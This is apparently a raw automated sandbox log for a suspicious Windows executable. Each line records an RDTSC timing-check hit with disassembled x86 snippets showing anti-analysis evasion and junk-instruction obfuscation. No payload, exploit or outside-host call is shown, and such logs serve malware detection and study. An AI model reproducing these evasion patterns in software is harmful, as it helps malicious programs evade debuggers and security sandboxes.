Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74918F second address: 7491A4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FED74F3E516h 0x00000008 jmp 00007FED74F3E51Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7491A4 second address: 7491C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FED75508870h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 749491 second address: 749499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 749499 second address: 74949E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74978D second address: 7497A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f jnp 00007FED74F3E51Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74DFD9 second address: 74DFE5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FED75508866h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74D88E second address: 74D8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FED74F3E51Fh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FED74F3E51Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74D8BC second address: 74D8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74DD1E second address: 74DD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74DD22 second address: 74DD31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74DD31 second address: 74DD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74DD3B second address: 74DD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7527AA second address: 7527AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7527AE second address: 7527DD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007FED75508866h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 push edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 jc 00007FED75508866h 0x0000001b pop edi 0x0000001c pushad 0x0000001d jmp 00007FED7550886Ah 0x00000022 je 00007FED75508866h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75298D second address: 752994 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752994 second address: 75299C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75299C second address: 7529A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752C69 second address: 752C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752C76 second address: 752C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752C80 second address: 752C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FED75508866h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752C8F second address: 752C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752DCB second address: 752DD1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752DD1 second address: 752DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752DD7 second address: 752DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752DDD second address: 752DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752DE1 second address: 752E02 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007FED75508866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ja 00007FED75508878h 0x00000014 push esi 0x00000015 jmp 00007FED7550886Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA470 second address: 6FA475 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA475 second address: 6FA502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+122D3900h] 0x0000000e mov ebx, dword ptr [ebp+12481454h] 0x00000014 or edx, 4FA532EDh 0x0000001a add eax, ebx 0x0000001c add dword ptr [ebp+122D184Fh], esi 0x00000022 jc 00007FED7550886Ch 0x00000028 push eax 0x00000029 jmp 00007FED7550886Eh 0x0000002e mov dword ptr [esp], eax 0x00000031 mov dword ptr [ebp+122D1820h], edi 0x00000037 push 00000004h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007FED75508868h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 sub dword ptr [ebp+122D184Fh], eax 0x00000059 call 00007FED7550886Fh 0x0000005e mov edi, dword ptr [ebp+122D3928h] 0x00000064 pop edi 0x00000065 push eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 push edx 0x0000006a pop edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA502 second address: 6FA510 instructions: 0x00000000 rdtsc 0x00000002 js 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752F93 second address: 752F9D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED75508866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752F9D second address: 752FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752FA3 second address: 752FA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752FA8 second address: 752FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 753B55 second address: 753B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED7550886Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 753B67 second address: 753B75 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7595BB second address: 7595C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75987C second address: 759897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FED74F3E525h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FED74F3E51Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 759EA2 second address: 759EC9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FED7550886Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FED75508875h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75A74A second address: 75A76D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FED74F3E516h 0x0000000a jmp 00007FED74F3E529h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75AA35 second address: 75AA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75AA3D second address: 75AA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FED74F3E516h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75AA4D second address: 75AA51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75AA51 second address: 75AA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FED74F3E529h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75AF84 second address: 75AF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75AF88 second address: 75AF8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75AF8C second address: 75AFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FED75508866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007FED75508866h 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 761012 second address: 761016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 761016 second address: 76101B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 764F61 second address: 764F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 764F65 second address: 764F6C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7645CC second address: 7645E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E520h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7645E3 second address: 7645ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7645ED second address: 7645FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FED74F3E516h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7645FB second address: 764601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76C14F second address: 76C1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FED74F3E516h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FED74F3E528h 0x00000011 pushad 0x00000012 popad 0x00000013 jc 00007FED74F3E516h 0x00000019 popad 0x0000001a jmp 00007FED74F3E523h 0x0000001f popad 0x00000020 pushad 0x00000021 jns 00007FED74F3E51Ah 0x00000027 push ebx 0x00000028 pushad 0x00000029 popad 0x0000002a pop ebx 0x0000002b push edx 0x0000002c jmp 00007FED74F3E51Fh 0x00000031 pop edx 0x00000032 push ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76C705 second address: 76C725 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FED75508866h 0x00000011 jne 00007FED75508866h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76C725 second address: 76C73A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76CB89 second address: 76CB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76CB8F second address: 76CBB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FED74F3E516h 0x00000009 jl 00007FED74F3E516h 0x0000000f jmp 00007FED74F3E51Fh 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c push esi 0x0000001d pop esi 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76D2C9 second address: 76D2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76D971 second address: 76D977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76D977 second address: 76D991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FED7550886Bh 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76D991 second address: 76D9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E529h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76D9AE second address: 76D9D3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FED75508866h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FED75508874h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76B8F9 second address: 76B91A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FED74F3E516h 0x00000010 pop eax 0x00000011 popad 0x00000012 push ebx 0x00000013 ja 00007FED74F3E51Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76B91A second address: 76B935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FED75508870h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 774059 second address: 774070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E523h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 773AAF second address: 773AB9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FED75508866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 773D43 second address: 773D60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 773D60 second address: 773D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 773D66 second address: 773D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 773D6B second address: 773D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 77F899 second address: 77F8A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 ja 00007FED74F3E516h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 77FA05 second address: 77FA0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 77FA0B second address: 77FA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 77FA11 second address: 77FA16 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 77FA16 second address: 77FA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 77FA23 second address: 77FA29 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 77FA29 second address: 77FA34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FED74F3E516h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 782171 second address: 782177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 78229B second address: 7822A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 793A55 second address: 793A5E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 793A5E second address: 793A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007FED74F3E51Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 797398 second address: 7973A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FED75508866h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7973A4 second address: 7973A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 797220 second address: 79723F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED75508879h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 79A8A4 second address: 79A8AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7A125E second address: 7A1264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7A1264 second address: 7A1271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007FED74F3E51Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7A1271 second address: 7A1278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7A034A second address: 7A0350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
